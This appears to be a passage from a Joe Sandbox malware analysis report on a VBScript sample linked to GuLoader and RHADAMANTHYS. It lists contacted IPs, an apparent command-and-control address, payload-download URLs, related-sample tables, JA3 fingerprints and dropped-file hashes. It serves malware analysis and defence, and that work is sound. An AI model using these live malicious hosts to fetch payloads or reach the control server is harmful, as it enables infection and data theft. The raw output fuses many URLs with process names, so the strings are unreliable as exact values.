                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.pts.group/ab/infantrymen.deployfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1820309274.000002241006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1936823765.0000000006147000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1920307649.0000000005235000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.microsoft.dNpowershell.exe, 00000005.00000002.1951933890.0000000007BC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1920307649.0000000005235000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.tdejb.com/ab/ab.binVerisTvewww.tequila.ae/ab/ab.binmsiexec.exe, 0000000A.00000002.2037678895.0000000021B30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://go.micropowershell.exe, 00000003.00000002.1793533146.0000022400BAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://contoso.com/Licensepowershell.exe, 00000005.00000002.1936823765.0000000006147000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.puneet.ae/ab/infantrymen.deploypowershell.exe, 00000003.00000002.1793533146.0000022400225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1793533146.00000224015AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://contoso.com/Iconpowershell.exe, 00000005.00000002.1936823765.0000000006147000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.tdejb.com/msiexec.exe, 0000000A.00000002.2022940955.0000000006A6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://pts.grouppowershell.exe, 00000003.00000002.1793533146.0000022401C6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1920307649.0000000005235000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22glsvchost.exefalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.pts.grouppowershell.exe, 00000003.00000002.1793533146.000002240191B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1793533146.0000022400225000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://crl.micropowershell.exe, 00000003.00000002.1836359278.000002247DC22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.1920307649.00000000050E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://developer.chrome.com/extensions/external_extensions.html)chrome.exe, 0000000D.00000002.2255888915.00006FF0022F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.tdejb.com/ab/ab.binVmsiexec.exe, 0000000A.00000002.2022940955.0000000006A2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://contoso.com/powershell.exe, 00000005.00000002.1936823765.0000000006147000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1820309274.000002241006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1936823765.0000000006147000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://aka.ms/pscore68powershell.exe, 00000003.00000002.1793533146.0000022400001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1793533146.0000022400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1920307649.00000000050E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.pts.grouppowershell.exe, 00000003.00000002.1793533146.0000022401C6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.puneet.ae/ab/infantrymen.deploytpowershell.exe, 00000005.00000002.1920307649.0000000005235000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      213.239.239.164
                                                                      		ntp1.hetzner.deGermany
                                                                      		24940HETZNER-ASDEfalse
                                                                      62.149.0.30
                                                                      		ntp.time.in.uaUkraine
                                                                      		15497COLOCALLInternetDataCenterColoCALLUAfalse
                                                                      129.6.15.28
                                                                      		time-a-g.nist.govUnited States
                                                                      		49US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUSfalse
                                                                      216.239.35.0
                                                                      		time.google.comUnited States
                                                                      		15169GOOGLEUSfalse
                                                                      162.159.200.123
                                                                      		time.cloudflare.comUnited States
                                                                      		13335CLOUDFLARENETUSfalse
                                                                      68.66.226.116
                                                                      		pts.groupUnited States
                                                                      		55293A2HOSTINGUSfalse
                                                                      45.149.241.141
                                                                      		unknownGermany
                                                                      		701UUNETUStrue
                                                                      239.255.255.250
                                                                      		unknownReserved
                                                                      		unknownunknownfalse
                                                                      202.71.109.228
                                                                      		tdejb.comMalaysia
                                                                      		17971TMVADS-APTM-VADSDCHostingMYfalse

                                                                      Private

                                                                      IP
                                                                      127.0.0.1

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1569005
                                                                      Start date and time:2024-12-05 10:45:05 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 9m 36s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:19
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:payload_1.vbs
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.expl.evad.winVBS@31/11@8/10
                                                                      EGA Information:
                                                                      • Successful, ratio: 42.9%
                                                                      HCA Information:
                                                                      • Successful, ratio: 64%
                                                                      • Number of executed functions: 196
                                                                      • Number of non-executed functions: 23
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .vbs

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 212.138.170.134, 17.253.18.131, 17.253.14.125, 17.253.18.99, 172.217.21.35, 172.217.17.46, 173.194.220.84, 23.218.208.109
                                                                      • Excluded domains from analysis (whitelisted): pool.ntp.org, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, time.apple.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, e16604.g.akamaiedge.net, time.g.aaplimg.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                                                                      • Execution Graph export aborted for target msiexec.exe, PID 5660 because there are no executed function
                                                                      • Execution Graph export aborted for target powershell.exe, PID 7020 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 984 because it is empty
                                                                      • Execution Graph export aborted for target svchost.exe, PID 3328 because there are no executed function
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: payload_1.vbs

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      04:45:55API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                      04:45:57API Interceptor83x Sleep call for process: powershell.exe modified
                                                                      04:46:50API Interceptor2x Sleep call for process: svchost.exe modified
                                                                      04:47:11API Interceptor1x Sleep call for process: wmpnscfg.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      213.239.239.164List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                        ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                          download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                            62.149.0.30List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                              ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                  wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                    129.6.15.28wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                      Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                                                                        mirai_nomiGet hashmaliciousMiraiBrowse
                                                                                          SecuriteInfo.com.Other.Malware-gen.28386.14039.elfGet hashmaliciousMiraiBrowse
                                                                                            SecuriteInfo.com.Other.Malware-gen.3200.4135.elfGet hashmaliciousMiraiBrowse
                                                                                              SecuriteInfo.com.Other.Malware-gen.31307.16494.elfGet hashmaliciousMiraiBrowse
                                                                                                SecuriteInfo.com.Linux.Siggen.6954.6684.13146.elfGet hashmaliciousMiraiBrowse
                                                                                                  SecuriteInfo.com.Other.Malware-gen.22921.14172.elfGet hashmaliciousMiraiBrowse
                                                                                                    PrHBHHWE5U.elfGet hashmaliciousMiraiBrowse
                                                                                                      y99ZI1Kjg8.exeGet hashmaliciousUnknownBrowse
                                                                                                        162.159.200.123List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                          NordVPN #U2013 private secure VPN_v5.8.6_apkpure.com.apkGet hashmaliciousUnknownBrowse
                                                                                                            FileZilla_3.50.0_win32-setup.exeGet hashmaliciousUnknownBrowse
                                                                                                              FileZilla_3.52.2_win64_sponsored-setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                FileZilla_3.52.2_win64_sponsored-setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                  68.66.226.116Bill Of Lading_MEDUVB935991.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.myrideguy.net/kgyd/
                                                                                                                  AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.myrideguy.net/kgyd/
                                                                                                                  Parfumens.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                  • www.arkgracechurch.com/qgq0/?ehzP8J=UhfgO53CoFS/baI5kBVtB1g8e8T/vciqKxKj6nf60DcK4G69QwsDs9mnRzbZxr8Ky8ZlNqHuRR+isOSUfNtlT6JPmq1blVIczw==&obSf_=6mSb4d
                                                                                                                  Afklde.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                  • www.arkgracechurch.com/qgq0/?RiMDw1pV=UhfgO53CoFS/baI5kBVtB1g8e8T/vciqKxKj6nf60DcK4G69QwsDs9mnRzbZxr8Ky8ZlNqHuRR+isOSUfNtlT6JPmq1blVIczw==&Yx5=ef1G-xddsOpF

                                                                                                                  Domains

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  time.cloudflare.comList of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 162.159.200.123
                                                                                                                  ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 162.159.200.1
                                                                                                                  download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                  • 162.159.200.1
                                                                                                                  time-a-g.nist.govwE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                  • 129.6.15.28
                                                                                                                  Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                                                                                                  • 129.6.15.28
                                                                                                                  y99ZI1Kjg8.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 129.6.15.28
                                                                                                                  QP6s4u5SZ8.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 129.6.15.28
                                                                                                                  2X3f1ykTmM.exeGet hashmaliciousKronosBrowse
                                                                                                                  • 129.6.15.28
                                                                                                                  kr.exeGet hashmaliciousKronosBrowse
                                                                                                                  • 129.6.15.28
                                                                                                                  WjmYak325l.exeGet hashmaliciousKronosBrowse
                                                                                                                  • 129.6.15.28
                                                                                                                  F75rJPKdGb.exeGet hashmaliciousKronosBrowse
                                                                                                                  • 129.6.15.28
                                                                                                                  ozJy5Zf5cf.exeGet hashmaliciousKronosBrowse
                                                                                                                  • 129.6.15.28
                                                                                                                  tgduMePOh0.exeGet hashmaliciousKronosBrowse
                                                                                                                  • 129.6.15.28
                                                                                                                  pts.groupab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 68.66.226.116
                                                                                                                  ntp.time.in.uaList of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 62.149.0.30
                                                                                                                  ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 62.149.0.30
                                                                                                                  download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                  • 62.149.0.30
                                                                                                                  wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                  • 62.149.0.30
                                                                                                                  ntp1.hetzner.deList of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 213.239.239.164
                                                                                                                  ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 213.239.239.164
                                                                                                                  download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                  • 213.239.239.164

                                                                                                                  ASNs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUSfbot.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                  • 129.6.93.244
                                                                                                                  sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                  • 129.6.157.62
                                                                                                                  wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                  • 129.6.15.28
                                                                                                                  Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                                                                                                  • 132.163.96.1
                                                                                                                  T8TY28UxiT.dllGet hashmaliciousUnknownBrowse
                                                                                                                  • 129.6.15.27
                                                                                                                  T8TY28UxiT.dllGet hashmaliciousUnknownBrowse
                                                                                                                  • 132.163.96.2
                                                                                                                  Q0cWJo6Jvh.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 132.163.97.1
                                                                                                                  Q0cWJo6Jvh.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 132.163.97.3
                                                                                                                  ExeFile (354).exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 132.163.97.1
                                                                                                                  ExeFile (355).exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 132.163.96.3
                                                                                                                  CLOUDFLARENETUSList of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 172.64.41.3
                                                                                                                  ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 172.64.41.3
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 172.67.165.166
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.16.9
                                                                                                                  https://click.pstmrk.it/3s/bmxn8t84vg.gherapilta.shop%2F/ySDk/28y5AQ/AQ/e82f1f59-f734-42be-affb-895d81855fb4/1/pD2JDTOBnbGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 172.67.156.195
                                                                                                                  REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 104.21.67.152
                                                                                                                  RFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  BACS190027-01.pdfGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.66.42.208
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.16.9
                                                                                                                  COLOCALLInternetDataCenterColoCALLUAList of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 62.149.0.30
                                                                                                                  ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 62.149.0.30
                                                                                                                  splmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                  • 31.28.168.19
                                                                                                                  download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                  • 62.149.0.30
                                                                                                                  wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                  • 62.149.0.30
                                                                                                                  http://pint77.com/Get hashmaliciousUnknownBrowse
                                                                                                                  • 62.149.0.249
                                                                                                                  DHL_2017128_Receipt_Document,pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                  • 31.28.171.149
                                                                                                                  DHL_2017128_Receipt_Document,pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                  • 31.28.171.149
                                                                                                                  DHL_2017128_Receipt_Document,pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                  • 31.28.171.149
                                                                                                                  https://www.todayville.com/meeting-the-threshold-justins-tantrum-gets-justice-rouleaus-approvalGet hashmaliciousUnknownBrowse
                                                                                                                  • 62.149.1.122
                                                                                                                  HETZNER-ASDEky.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 148.251.114.233
                                                                                                                  List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 213.239.239.164
                                                                                                                  ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 213.239.239.164
                                                                                                                  script.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 148.251.114.233
                                                                                                                  mg.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 148.251.114.233
                                                                                                                  mj.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 148.251.114.233
                                                                                                                  ap.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 148.251.114.233
                                                                                                                  cu.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 148.251.114.233
                                                                                                                  Scripts_Obfusque.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 148.251.114.233
                                                                                                                  ni.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 148.251.114.233

                                                                                                                  JA3 Fingerprints

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eky.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 68.66.226.116
                                                                                                                  List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 68.66.226.116
                                                                                                                  ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 68.66.226.116
                                                                                                                  script.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 68.66.226.116
                                                                                                                  mg.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 68.66.226.116
                                                                                                                  mj.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 68.66.226.116
                                                                                                                  ap.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 68.66.226.116
                                                                                                                  cu.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 68.66.226.116
                                                                                                                  Scripts_Obfusque.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 68.66.226.116
                                                                                                                  ni.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 68.66.226.116
                                                                                                                  37f463bf4616ecd445d4a1937da06e19List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 202.71.109.228
                                                                                                                  ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 202.71.109.228
                                                                                                                  REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  • 202.71.109.228
                                                                                                                  comp#U00e1rtilhar080425-000800-66000544000.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 202.71.109.228
                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 202.71.109.228
                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 202.71.109.228
                                                                                                                  comp#U00e1rtilhar080425-000800-66000544000.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 202.71.109.228
                                                                                                                  venomderek.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                  • 202.71.109.228
                                                                                                                  Ttok18.exeGet hashmaliciousVidarBrowse
                                                                                                                  • 202.71.109.228
                                                                                                                  caec7ddf6889590d999d7ca1b76373b6List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 45.149.241.141
                                                                                                                  ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                  • 45.149.241.141
                                                                                                                  download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                  • 45.149.241.141
                                                                                                                  wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                  • 45.149.241.141
                                                                                                                  0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                  • 45.149.241.141
                                                                                                                  UGcjMkPWwW.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                  • 45.149.241.141
                                                                                                                  XAhzDHAVZ2.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                  • 45.149.241.141
                                                                                                                  TctqdRX5Wq.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                  • 45.149.241.141
                                                                                                                  g753nr4GI9.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                  • 45.149.241.141
                                                                                                                  msvcp110.dllGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                  • 45.149.241.141

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1310720
                                                                                                                  Entropy (8bit):1.3073662221520221
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrG:KooCEYhgYEL0In
                                                                                                                  MD5:52EF3184110E7D50EB96D53A95F5CD82
                                                                                                                  SHA1:1E02777AB43B037A5A2A37406281ED106BE072CC
                                                                                                                  SHA-256:0A9358C9AC265B3874E8C7814DC5ABD8141A6E0EBC71C1F3C94B482EA87F905D
                                                                                                                  SHA-512:BF9C2F46F31AE10EFAB7B64D15CE492E7DDDD269D9330B47BFBBA780AB65A0E20DF4DE2C4CA9A4128A5F3CE5ADC2D38B5788AFC180211FC175EA86D98FF7CD8F
                                                                                                                  Malicious:false
                                                                                                                  Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xc61e69aa, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1310720
                                                                                                                  Entropy (8bit):0.42213473051787315
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                                                                                                  MD5:955F4E3B49B1E4DEDB6C713A49A79944
                                                                                                                  SHA1:21964181DDBB8E798A41096C7FC87E98BCE34FC7
                                                                                                                  SHA-256:C2364C23A89EBDB03890E0580AC6A47CFE836271334C6911CA1D41B98BF25509
                                                                                                                  SHA-512:C01D15115728D4004889B5016046D79A8E1BD37BD0F94062BE6401B42278CAB5045EFC00D09F0947118637DA0D383E6D218A823D59BDD4A5B8BC1380ADA30541
                                                                                                                  Malicious:false
                                                                                                                  Preview:..i.... .......A.......X\...;...{......................0.!..........{A.3....|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{....................................,U3....|..................}...3....|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):16384
                                                                                                                  Entropy (8bit):0.077038697004612
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:RAilEYehN3N0kjn13a/7VYr//lollcVO/lnlZMxZNQl:hEzhUk53q7yeOewk
                                                                                                                  MD5:2A1C99E1DD8F12C34CEE27129DEBF628
                                                                                                                  SHA1:3ACB1F1E3754C91C7D05E33BF54B5E30834E228F
                                                                                                                  SHA-256:C70366231A953DF61332278496C7EE345258E80660A1BBE6227BC44F55A8B3CA
                                                                                                                  SHA-512:3115927395741CFAEC83FA955ACA00E4C8C108B816D9F4E20A9B6A6078F2D5F1A95F914B8C697D4E6749B734ACEB19E7DDE812C6D828C136AD3AF78900FEC5CC
                                                                                                                  Malicious:false
                                                                                                                  Preview:NA.......................................;...{..3....|.......{A..............{A......{A..........{A]................}...3....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):8003
                                                                                                                  Entropy (8bit):4.840877972214509
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                                                  MD5:106D01F562D751E62B702803895E93E0
                                                                                                                  SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                                                  SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                                                  SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                                                  Malicious:false
